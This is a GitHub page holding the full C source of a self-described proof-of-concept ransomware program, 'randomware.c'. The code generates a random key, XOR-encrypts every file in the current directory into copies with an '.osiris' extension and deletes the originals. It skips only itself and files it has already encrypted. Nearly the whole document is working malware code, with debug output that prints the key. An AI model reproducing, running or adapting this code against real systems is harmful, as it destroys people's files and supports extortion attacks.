randomware/randomware.c at master · afjoseph/randomware · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
/*
 * PoC Ransomware
 * Copyright (C) 2019 Abdullah Joseph (afjoseph)
 */
/**********************************************************************************************************************/

#include <dirent.h>
#include <elf.h>
#include <errno.h>
#include <fcntl.h>
#include <libgen.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* This is the new extension of a "ransomed" file */
#define RANSOMED_EXT ".osiris"
#define CHARSET "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
#define KEY_LEN 32

#define DBG

/* Count of crypted files */
/*static int Enc_Files = 0;*/

/* never displayed msg */
const char *never_displayed = "Randomware by [afjoseph]";

void rand_str(char *dest, size_t size) {
    for (size_t n = 0; n < size; n++) {
        int key = rand() % (int)(sizeof CHARSET - 1);
        dest[n] = CHARSET[key];
    }
    dest[size] = '\0';
}

void encrypt_block(uint8_t *ret_char, uint8_t char_to_xor, int counter,
                   const uint8_t *key, size_t len_key) {
    uint8_t key_char = key[counter % len_key];
    *ret_char = char_to_xor ^ key_char;

#ifdef DBG
    printf("counter     = %d\n", counter);
    printf("key_char    = 0x%02x\n", key_char);
    printf("byte_to_xor = 0x%02x\n", char_to_xor);
    printf("ret_char    = 0x%02x\n", *ret_char);
#endif
}

int is_filename_proper(const char *filename) {
    // Don't iterate over dots
    if (strcmp(".", filename) == 0 || strcmp("..", filename) == 0) {
        return 1;
    }

    // Don't delete yourself or already encrypted files
    if (strstr(filename, "randomware") != 0 ||
        strstr(filename, ".osiris") != 0) {
        return 1;
    }

    return 0;
}

void encrypt_file(const char *orig_filepath, const uint8_t *key,
                  size_t len_key) {
    char *bname;
    char *new_filepath;
    int origfile_fd, newfile_fd;
    struct stat st;
    int i;
    uint8_t *mem, *newmem;

    bname = basename((char *)orig_filepath);

    if (is_filename_proper(bname) != 0) {
        return;
    }

    if ((origfile_fd = open(orig_filepath, O_RDONLY)) < 0) {
        fprintf(stderr, "[!] open failed %s\n", orig_filepath);
        return;
    }

    if (fstat(origfile_fd, &st) < 0) {
        fprintf(stderr, "[!] fstat failed %s\n", orig_filepath);
        return;
    }

    // Open new file for writing
    new_filepath = strdup(orig_filepath);
    strcat(new_filepath, RANSOMED_EXT);
#ifdef DBG
    printf("new filepath: %s\n", new_filepath);
#endif

    if ((newfile_fd = open(new_filepath, O_WRONLY | O_CREAT | O_TRUNC)) < 0) {
        fprintf(stderr, "[!] open failed %s\n", new_filepath);
        return;
    }

    fchmod(newfile_fd, st.st_mode);  // Don't handle error

    // Copy memory
    mem = (uint8_t *)mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, origfile_fd,
                          0);
    if (mem == MAP_FAILED) {
        fprintf(stderr, "[!] mmap failed\b");
        return;
    }

    newmem = (uint8_t *)alloca(st.st_size);

#ifdef DBG
    printf("\torig_filepath: %s\n", orig_filepath);
    printf("\tsize of file %ld\n", st.st_size);
    printf("\tfirst 4 bytes:\n");
    for (i = 0; i < 4; i++) {
        printf("\t%d: %02x\n", i, mem[i]);
    }

    printf("\tLast byte:\n");
    printf("\t%ld: %02x\n", st.st_size, mem[st.st_size - 2]);
    printf("\n");
#endif

    for (i = 0; i < st.st_size; i++) {
        encrypt_block(&newmem[i], mem[i], i, key, len_key);
#ifdef DBG
        printf("\rprogress: %ld\r", (i / st.st_size) * 100);
#endif
    }

    if ((write(newfile_fd, newmem, st.st_size)) <= 0) {
        fprintf(stderr, "[!] write failed %s", new_filepath);
        return;
    }

    remove(orig_filepath);  // Don't handle any errors

    close(newfile_fd);
    close(origfile_fd);
}

int main(int argc, char **argv) {
    DIR *d;
    struct dirent *dir;
    char *key;

    key = (char *) alloca(KEY_LEN * sizeof(char));
    rand_str(key, KEY_LEN);

#ifdef DBG
    printf("key is: %s\n", key);
#endif

    d = opendir(".");
    if (d) {
        while ((dir = readdir(d)) != NULL) {
            encrypt_file(dir->d_name, (const uint8_t *)key, KEY_LEN);
        }

        closedir(d);
    }
}